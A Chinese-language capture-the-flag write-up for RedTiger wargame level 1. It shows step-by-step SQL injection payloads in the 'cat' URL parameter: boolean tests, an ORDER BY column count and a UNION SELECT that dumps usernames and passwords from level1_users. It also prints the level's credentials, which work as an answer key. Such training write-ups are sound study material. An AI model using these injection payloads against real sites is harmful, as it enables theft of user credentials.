level 1

level 1

 

 题目是一个表单,让我们尝试用Hornoxe用户登录

在表单中利用万能密码爆破无果后,发现1的链接

http://redtiger.labs.overthewire.org/level1.php?cat=1

cat参数存在注入点

http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=1 回显信息

level 1

 

 http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2 

 

level 1

 

 order by 判断段数为4

http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2 union select 1,2,3,4 回显3,4列

level 1

 

 尝试暴库发现被禁止,看到网上其他大佬的WP发现一开始的题目中已经给出了表名,又想到username和password字段,于是直接查表

http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2 union select 1,2,username,password from level1_users

得到账户密码:

Hornoxe
thatwaseasy

登录并拿到flag

level 1

 

以上是 level 1 的全部内容, 来源链接: utcz.com/a/76975.html

回到顶部